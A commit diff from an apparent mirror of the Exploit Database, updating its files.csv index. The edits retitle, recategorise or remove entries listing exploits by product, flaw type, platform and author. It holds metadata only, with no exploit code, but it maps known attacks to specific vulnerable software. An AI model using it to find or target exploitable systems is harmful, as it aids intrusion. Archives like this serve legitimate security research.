bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated

Browse source
This commit is contained in:
Offensive Security 2013-12-03 22:42:55 +00:00
parent fffbf04102
commit 18d0bd4ec0
77 changed files with 2621 additions and 2354 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

122
files.csv
View file

@ -10054,7 +10054,7 @@ id,file,description,date,author,platform,type,port
10874,platforms/php/webapps/10874.txt,"Pre News Manager (nid) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
10877,platforms/php/webapps/10877.txt,"php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
10878,platforms/php/webapps/10878.txt,"Invision Power Board(Trial) v2.0.4 Backup Vulnerability",2009-12-31,indoushka,php,webapps,0
10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup Vulnerability",2009-12-31,indoushka,php,webapps,0
10879,platforms/windows/dos/10879.html,"Google Chrome 3.0195.38 Status Bar Obfuscation",2009-12-31,"599eme Man",windows,dos,0
10880,platforms/php/webapps/10880.php,"bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit",2009-12-31,cOndemned,php,webapps,0
10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 .aap BOF DOS Vulnerability",2009-12-31,jacky,windows,dos,0
@ -15578,7 +15578,7 @@ id,file,description,date,author,platform,type,port
17959,platforms/php/webapps/17959.txt,"POSH Multiple Vulnerabilities",2011-10-10,Crashfr,php,webapps,0
17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 (SVG layout) Memory Corruption (0day)",2011-10-10,"Jose A. Vazquez",windows,remote,0
17961,platforms/php/webapps/17961.txt,"MyBB Advanced Forum Signatures (afsignatures-2.0.4) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0
17962,platforms/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar v2.2) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0
17962,platforms/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,php,webapps,0
17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server <= 1.0 Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0
17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN <= 8.0.0.7 Use After Free",2011-10-10,"Luigi Auriemma",windows,dos,0
17965,platforms/windows/dos/17965.txt,"OPC Systems.NET <= 4.00.0048 Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0
@ -15586,7 +15586,7 @@ id,file,description,date,author,platform,type,port
17967,platforms/windows/local/17967.rb,"TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability",2011-10-11,metasploit,windows,local,0
17969,platforms/multiple/remote/17969.py,"Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC",2011-10-11,"Rodrigo Marcos",multiple,remote,0
17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability",2011-10-11,cheki,php,webapps,0
17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 SQL Injection Vulnerability",2011-10-12,Mario_Vs,php,webapps,0
17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection Vulnerability",2011-10-12,Mario_Vs,php,webapps,0
17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin <= 1.9.10 SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0
17974,platforms/windows/remote/17974.html,"Mozilla Firefox Array.reduceRight() Integer Overflow Exploit",2011-10-12,"Matteo Memelli",windows,remote,0
17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",2011-10-12,metasploit,windows,remote,0
@ -19251,7 +19251,7 @@ id,file,description,date,author,platform,type,port
22000,platforms/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 Admin Interface Cross Site Scripting Vulnerability",2002-11-08,euronymous,cgi,remote,0
22001,platforms/windows/remote/22001.txt,"Simple Web Server 0.5.1 File Disclosure Vulnerability",2002-11-08,"Tamer Sahin",windows,remote,0
22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 Application Packager Non-Explicit Path Execution Vulnerability",2002-11-08,Texonet,linux,local,0
22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection",2012-10-16,Zixem,php,webapps,0
22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) - SQL Injection",2012-10-16,Zixem,php,webapps,0
22004,platforms/php/webapps/22004.txt,"Joomla iCagenda Component (id parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0
22005,platforms/hardware/webapps/22005.txt,"Visual Tools DVR <= 3.0.6.16, VX Series <= 4.2.19.2 Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0
22006,platforms/windows/dos/22006.txt,"Ezhometech EzServer 7.0 Remote Heap Corruption Vulnerability",2012-10-16,"Lorenzo Cantoni",windows,dos,0
@ -19642,7 +19642,7 @@ id,file,description,date,author,platform,type,port
22401,platforms/windows/dos/22401.php,"Internet Explorer 9 Memory Corruption Crash PoC",2012-11-01,"Jean Pascal Pereira",windows,dos,0
22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) WriteAV Crash PoC",2012-11-01,coolkaveh,windows,dos,0
22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog (index.php, product_id parameter) SQL Injection Vulnerability",2012-11-01,D4NB4R,php,webapps,0
22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin SQL Injection",2012-11-01,Zixem,php,webapps,0
22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0
22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0
22407,platforms/hardware/dos/22407.txt,"Netgear 1.x ProSafe VPN Firewall Web Interface Login Denial Of Service Vulnerability",2003-03-21,"Paul Kurczaba",hardware,dos,0
22408,platforms/cgi/webapps/22408.txt,"Planetmoon Guestbook Clear Text Password Retrieval Vulnerability",2003-03-21,subj,cgi,webapps,0
@ -20322,7 +20322,7 @@ id,file,description,date,author,platform,type,port
23101,platforms/windows/dos/23101.c,"Microsoft Windows 98 Fragmented UDP Flood Denial Of Service Vulnerability",2003-09-04,WARL0RD,windows,dos,0
23102,platforms/windows/dos/23102.pl,"FoxWeb 2.5 PATH_INFO Remote Buffer Overrun Vulnerability",2003-06-27,pokleyzz,windows,dos,0
23103,platforms/php/webapps/23103.txt,"Digital Scribe 1.x Error Function Cross-Site Scripting Vulnerability",2003-09-05,Secunia,php,webapps,0
23105,platforms/php/webapps/23105.txt,"myBB KingChat Plugin SQL Injection",2012-12-03,Red_Hat,php,webapps,0
23105,platforms/php/webapps/23105.txt,"myBB KingChat Plugin - SQL Injection",2012-12-03,Red_Hat,php,webapps,0
23106,platforms/php/webapps/23106.txt,"SchoolCMS Persistent XSS",2012-12-03,VipVince,php,webapps,0
23107,platforms/windows/dos/23107.txt,"Opera Web Browser 12.11 Crash PoC",2012-12-03,coolkaveh,windows,dos,0
23109,platforms/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 CSRF Vulnerability",2012-12-03,"Ben Williams",multiple,webapps,0
@ -20463,7 +20463,7 @@ id,file,description,date,author,platform,type,port
23246,platforms/windows/dos/23246.txt,"Sumatra 2.1.1/MuPDF 1.0 Integer Overflow",2012-12-09,beford,windows,dos,0
23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability",2003-10-25,Adik,windows,remote,0
23248,platforms/arm/dos/23248.txt,"Android Kernel 2.6 Local DoS Crash PoC",2012-12-09,G13,arm,dos,0
23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin Persistent XSS",2012-12-09,VipVince,php,webapps,0
23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent XSS",2012-12-09,VipVince,php,webapps,0
23250,platforms/hardware/webapps/23250.txt,"Cisco DPC2420 Multiples Vulnerabilities",2012-12-09,"Facundo M. de la Cruz",hardware,webapps,0
23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager v2.1.0.283 Local Root",2012-12-09,"Larry W. Cashdollar",linux,local,0
23252,platforms/php/webapps/23252.txt,"ClipBucket 2.6 Revision 738 Multiple SQL Injection Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0
@ -20495,9 +20495,9 @@ id,file,description,date,author,platform,type,port
23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0
23282,platforms/multiple/remote/23282.txt,"Apache Cocoon 2.14/2.2 Directory Traversal Vulnerability",2003-10-24,"Thierry De Leeuw",multiple,remote,0
23283,platforms/windows/remote/23283.txt,"Microsoft Internet Explorer 6.0 Local Resource Reference Vulnerability",2003-10-24,Mindwarper,windows,remote,0
23284,platforms/php/webapps/23284.txt,"MyBB Bank-v3 Plugin SQL Injection",2012-12-11,Red_Hat,php,webapps,0
23284,platforms/php/webapps/23284.txt,"MyBB Bank- 3 Plugin - SQL Injection",2012-12-11,Red_Hat,php,webapps,0
23286,platforms/php/webapps/23286.txt,"Joomla JooProperty 1.13.0 Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0
23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0
23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0
23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0
23289,platforms/php/webapps/23289.txt,"PHP Nuke 8.2.4 CSRF Vulnerability",2012-12-11,sajith,php,webapps,0
23290,platforms/windows/remote/23290.rb,"HP Data Protector DtbClsLogin Buffer Overflow",2012-12-11,metasploit,windows,remote,0
@ -20532,7 +20532,7 @@ id,file,description,date,author,platform,type,port
23319,platforms/php/webapps/23319.txt,"Tritanium Scripts Tritanium Bulletin Board 1.2.3 Unauthorized Access Vulnerability",2003-10-31,"Virginity Security",php,webapps,0
23320,platforms/multiple/remote/23320.txt,"Mldonkey 2.5 -4 Web Interface Error Message Cross-site Scripting Vulnerability",2003-10-31,"Chris Sharp",multiple,remote,0
23321,platforms/windows/remote/23321.txt,"Microsoft Internet Explorer 6-10 Mouse Tracking",2012-12-12,"Nick Johnson",windows,remote,0
23322,platforms/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin Multiple Vulnerabilities",2012-12-12,VipVince,php,webapps,0
23322,platforms/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,php,webapps,0
23323,platforms/windows/remote/23323.py,"Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability (0day)",2012-12-12,Abysssec,windows,remote,0
23324,platforms/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 Path Traversal Vulnerability",2012-12-12,"Sebastian Perez",windows,webapps,0
23325,platforms/multiple/dos/23325.c,"BRS WebWeaver 1.06 httpd `User-Agent` Remote Denial of Service Vulnerability",2003-11-01,D4rkGr3y,multiple,dos,0
@ -20563,11 +20563,11 @@ id,file,description,date,author,platform,type,port
23350,platforms/linux/local/23350.c,"TerminatorX 3.8 Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (1)",2003-11-07,c0wboy,linux,local,0
23351,platforms/linux/local/23351.c,"TerminatorX 3.8 Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (2)",2003-11-07,Bobby,linux,local,0
23352,platforms/linux/local/23352.c,"TerminatorX 3.8 Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (3)",2003-11-07,"m00 security",linux,local,0
23353,platforms/php/webapps/23353.txt,"MyYoutube MyBB Plugin 1.0 SQL Injection",2012-12-13,Zixem,php,webapps,0
23354,platforms/php/webapps/23354.txt,"MyBB AJAX Chat Persistent XSS Vulnerability",2012-12-13,"Mr. P-teo",php,webapps,0
23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 Persistant XSS",2012-12-13,limb0,php,webapps,0
23353,platforms/php/webapps/23353.txt,"MyYoutube MyBB Plugin 1.0 - SQL Injection",2012-12-13,Zixem,php,webapps,0
23354,platforms/php/webapps/23354.txt,"MyBB AJAX Chat - Persistent XSS Vulnerability",2012-12-13,"Mr. P-teo",php,webapps,0
23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistant XSS",2012-12-13,limb0,php,webapps,0
23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin Wordpress Plugin Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0
23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin (newreply.php) SQL Injection Vulnerability",2012-12-13,JoinSe7en,php,webapps,0
23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin (newreply.php) - SQL Injection Vulnerability",2012-12-13,JoinSe7en,php,webapps,0
23360,platforms/linux/remote/23360.rb,"PostgreSQL for Linux Payload Execution",2012-12-13,metasploit,linux,remote,0
23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0
23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3-2.3.9-4 Blind SQL Injection Exploit",2012-12-13,modpr0be,php,webapps,0
@ -20590,7 +20590,7 @@ id,file,description,date,author,platform,type,port
23379,platforms/hardware/remote/23379.txt,"FortiGate Firewall 2.x selector Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0
23380,platforms/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 Error Message Cross-Site Scripting Vulnerability",2003-11-13,"Oliver Karow",multiple,remote,0
23381,platforms/php/webapps/23381.txt,"phpWebFileManager 2.0 index.php Directory Traversal Vulnerability",2003-11-17,"RusH security team",php,webapps,0
23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 Cross Site Scripting",2012-12-14,s3m00t,php,webapps,0
23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross Site Scripting",2012-12-14,s3m00t,php,webapps,0
23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 $path Remote File Include Vulnerability",2003-11-17,"RusH security team",php,webapps,0
23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service Cross-Site Scripting Vulnerability",2003-11-17,"Ziv Kamir",multiple,remote,0
23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 Cross-Site Scripting Vulnerability",2003-11-17,"David Sopas Ferreira",php,webapps,0
@ -20631,7 +20631,7 @@ id,file,description,date,author,platform,type,port
23421,platforms/cgi/webapps/23421.txt,"CalaCode @mail Webmail System 3.52 Multiple Vulnerabilities",2003-12-09,"Nick Gudov",cgi,webapps,0
23422,platforms/windows/remote/23422.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0
23423,platforms/windows/remote/23423.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0
23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 Stored XSS",2012-12-16,limb0,php,webapps,0
23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Stored XSS",2012-12-16,limb0,php,webapps,0
23427,platforms/linux/dos/23427.txt,"Totem Movie Player (Ubuntu) 3.4.3 Stack Corruption",2012-12-16,coolkaveh,linux,dos,0
23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server user.php Script Unauthorized Access Vulnerability",2003-12-10,frog,php,webapps,0
23429,platforms/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server SQL Injection Vulnerability",2003-12-10,"Chintan Trivedi",php,webapps,0
@ -20819,8 +20819,8 @@ id,file,description,date,author,platform,type,port
23621,platforms/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 PHP Script admin.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0
23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 Remote Port Forwarding Shellcode 87 bytes",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
23623,platforms/php/webapps/23623.txt,"City Directory Review and Rating Script (search.php) SQL Injection Vulnerability",2012-12-24,3spi0n,php,webapps,0
23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags SQL Injection",2012-12-24,JoinSe7en,php,webapps,0
23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin (index.php, id parameter) SQL Injection Vulnerability",2012-12-24,Red_Hat,php,webapps,0
23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps,0
23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin (index.php, id parameter) - SQL Injection Vulnerability",2012-12-24,Red_Hat,php,webapps,0
23628,platforms/php/webapps/23628.txt,"JBrowser 1.0/2.x Unauthorized Admin Access Vulnerability",2004-01-30,"Himeur Nourredine",php,webapps,0
23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 Remote Command Execution Vulnerability",2004-01-31,ActualMInd,cgi,webapps,0
23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 File Disclosure Vulnerability",2004-01-31,"Zero X",php,webapps,0
@ -20974,7 +20974,7 @@ id,file,description,date,author,platform,type,port
23778,platforms/hardware/dos/23778.c,"Motorola T720 Phone Denial Of Service Vulnerability",2004-03-01,"Shaun Colley",hardware,dos,0
23779,platforms/linux/dos/23779.txt,"Grep < 2.11 Integer Overflow Crash PoC",2012-12-31,"Joshua Rogers",linux,dos,0
23780,platforms/windows/dos/23780.py,"Aktiv Player 2.80 Crash PoC",2012-12-31,IndonesiaGokilTeam,windows,dos,0
23781,platforms/php/webapps/23781.txt,"MyBB (editpost.php, posthash) SQL Injection Vulnerability",2012-12-31,"Joshua Rogers",php,webapps,0
23781,platforms/php/webapps/23781.txt,"MyBB (editpost.php, posthash) - SQL Injection Vulnerability",2012-12-31,"Joshua Rogers",php,webapps,0
23782,platforms/php/webapps/23782.txt,"Joomla Spider Calendar (index.php, date param) Blind SQL Injection Vulnerability",2012-12-31,Red-D3v1L,php,webapps,0
23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 PLF Exploit DEP/ASLR Bypass (MSF)",2012-12-31,"Craig Freyman",windows,local,0
23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",2013-01-02,metasploit,windows,remote,0
@ -21076,7 +21076,7 @@ id,file,description,date,author,platform,type,port
23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0
23886,platforms/windows/webapps/23886.txt,"Simple Webserver 2.3-rc1 Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0
23887,platforms/windows/remote/23887.rb,"Enterasys NetSight nssyslogd.exe Buffer Overflow",2013-01-04,metasploit,windows,remote,0
23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0
23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0
23890,platforms/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x HTML Injection Vulnerability",2004-03-29,"koi8-r Shelz",cgi,webapps,0
23891,platforms/asp/webapps/23891.txt,"Alan Ward A-Cart 2.0 category.asp catcode Parameter SQL Injection",2004-03-29,"Manuel Lopez",asp,webapps,0
23892,platforms/linux/local/23892.c,"Systrace 1.x Local Policy Bypass Vulnerability",2004-03-29,Brad,linux,local,0
@ -25322,7 +25322,7 @@ id,file,description,date,author,platform,type,port
28280,platforms/php/webapps/28280.txt,"wwwThreads Calendar.PHP Cross-Site Scripting Vulnerability",2006-07-26,l2odon,php,webapps,0
28281,platforms/php/webapps/28281.txt,"phpbb-auction 1.x auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
28283,platforms/php/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,php,webapps,0
28283,platforms/hardware/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0
28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution",2013-09-15,Blake,windows,remote,0
28285,platforms/php/webapps/28285.txt,"Zyxel Prestige 660H-61 ADSL Router RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,php,webapps,0
28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability",2006-07-27,hdm,windows,dos,0
@ -26171,7 +26171,6 @@ id,file,description,date,author,platform,type,port
29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 ticketview.php Multiple Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0
29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 ticket.php email Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0
29167,platforms/windows/remote/29167.rb,"NetGear WG311v1 Wireless Driver 2.3.1 10 SSID Heap Buffer Overflow Vulnerability",2006-11-22,"Laurent Butti",windows,remote,0
29168,platforms/osx/remote/29168.pl,"Apple Remote Desktop 3.7 - PoC",2013-10-25,"S2 Crew",osx,remote,0
29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 Keystone.EXE Local Denial of Service Vulnerability",2006-11-23,Hessam-x,windows,dos,0
29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional File Handling Buffer Overflow Vulnerability",2006-11-23,LSsec.com,windows,remote,0
29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 HTMLMARQ.OCX Library Denial of Service Vulnerability",2006-11-22,"Michal Bucko",windows,dos,0
@ -26306,7 +26305,6 @@ id,file,description,date,author,platform,type,port
29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0
29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0
29316,platforms/php/remote/29316.py,"Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner v2)",2013-10-31,noptrix,php,remote,0
29317,platforms/php/local/29317.txt,"MOD_PHP - Bypass Symlink From Sihosin Patch",2013-10-31,virusa.worm,php,local,0
29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0
29319,platforms/php/remote/29319.rb,"vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution",2013-10-31,metasploit,php,remote,80
29320,platforms/php/remote/29320.rb,"NAS4Free - Arbitrary Remote Code Execution",2013-10-31,metasploit,php,remote,80
@ -26488,8 +26486,6 @@ id,file,description,date,author,platform,type,port
29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 Show.PHP Cross-Site Scripting Vulnerability",2007-01-22,Linux_Drox,php,webapps,0
29508,platforms/php/webapps/29508.sh,"Vote! Pro 4.0 Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps,0
29509,platforms/osx/dos/29509.txt,"Apple Mac OS X 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption Vulnerability",2007-01-23,LMH,osx,dos,0
29510,platforms/windows/remote/29510.txt,"Microsoft Internet Explorer ""AddDesktopComponent()"" - Cross Zone Scripting Remote Code Execution Vulnerability",2013-11-08,"Eduardo Prado",windows,remote,0
29511,platforms/windows/remote/29511.txt,"Microsoft Internet Explorer - File Download Extension Spoofing Vulnerability",2013-11-08,"Eduardo Prado",windows,remote,0
29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 - 2.0.18.5 (class.utilitycontroller.php) - PHP Object Injection Vulnerability",2013-11-08,EgiX,php,webapps,80
29513,platforms/linux/remote/29513.rb,"VICIdial Manager Send OS Command Injection",2013-11-08,metasploit,linux,remote,80
29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection Vulnerability",2013-11-08,"High-Tech Bridge SA",php,webapps,80
@ -26678,7 +26674,7 @@ id,file,description,date,author,platform,type,port
29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez, Eduardo Arriols",linux,remote,0
29707,platforms/windows/dos/29707.txt,"JPEGView 1.0.29 - Crash PoC",2013-11-19,"Debasish Mandal",windows,dos,0
29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80
29711,platforms/linux/dos/29711.txt,"Linux Kernel bt8xx Video Driver IOCTL Heap Overflow",2013-11-19,x90c,linux,dos,0
29711,platforms/linux/dos/29711.txt,"Linux Kernel bt8xx Video Driver IOCTL - Heap Overflow",2013-11-19,x90c,linux,dos,0
29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 PHP.INI File Modification Vulnerability",2007-03-03,"Stefan Esser",php,local,0
29713,platforms/linux/dos/29713.html,"KDE Konqueror 3.5 JavaScript IFrame Denial of Service Vulnerability",2007-03-05,mark,linux,dos,0
29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - Sys_Tee Local Privilege Escalation Vulnerability",2007-03-05,"Michael Kerrisk",linux,local,0
@ -26797,9 +26793,6 @@ id,file,description,date,author,platform,type,port
29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0
29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0
29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins Remote File Upload Vulnerability",2013-11-26,link_satisi,php,webapps,0
29835,platforms/php/webapps/29835.txt,"geecomPROMO 1.5 Multiple SQL injection vulnerability",2013-11-26,"Andrea Scarpa",php,webapps,0
29836,platforms/php/webapps/29836.txt,"appRain-v-3.0.2::Stored XSS on multiple parameters & CSRF vulnerability's",2013-11-26,sajith,php,webapps,0
29837,platforms/php/webapps/29837.txt,"Open TestBed framework arbitrary file upload exploit",2013-11-26,"3rr0r1046 IndiShell",php,webapps,0
29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0
29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0
29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
@ -26878,16 +26871,14 @@ id,file,description,date,author,platform,type,port
29914,platforms/php/webapps/29914.txt,"Doruk100Net Info.PHP Remote File Include Vulnerability",2007-04-26,Ali7,php,webapps,0
29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x Index.PHP Cross-Site Scripting Vulnerability",2007-04-26,"En Douli",php,webapps,0
29916,platforms/linux/dos/29916.c,"Linux Kernel 2.6.x NETLINK_FIB_LOOKUP Local Denial of Service Vulnerability",2007-04-26,"Alexey Kuznetsov",linux,dos,0
29917,platforms/php/webapps/29917.php,"FlashComs Chat - Arbitrary File Upload Vulnerability",2013-11-30,"Miya Chung",php,webapps,0
29917,platforms/php/webapps/29917.php,"FlashComs Chat <= 6.5 - Arbitrary File Upload Vulnerability",2013-11-30,"Miya Chung",php,webapps,0
29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - (lang parameter) XPath Injection Vulnerability",2013-11-30,LiquidWorm,java,webapps,0
29919,platforms/hardware/dos/29919.py,"TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite N Router HTTP DoS",2013-11-30,"Dino Causevic",hardware,dos,0
29920,platforms/linux/dos/29920.py,"Uptime Agent 5.0.1 - Stack Overflow Vulnerability",2013-11-30,"Denis Andzakovic",linux,dos,0
29921,platforms/php/webapps/29921.py,"Zend-Framework - Full Info Disclosure",2013-11-30,"Ariel Orellana",php,webapps,0
29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - (.wps) Buffer Overflow Exploit (SEH)",2013-11-30,"Julien Ahrens",windows,local,0
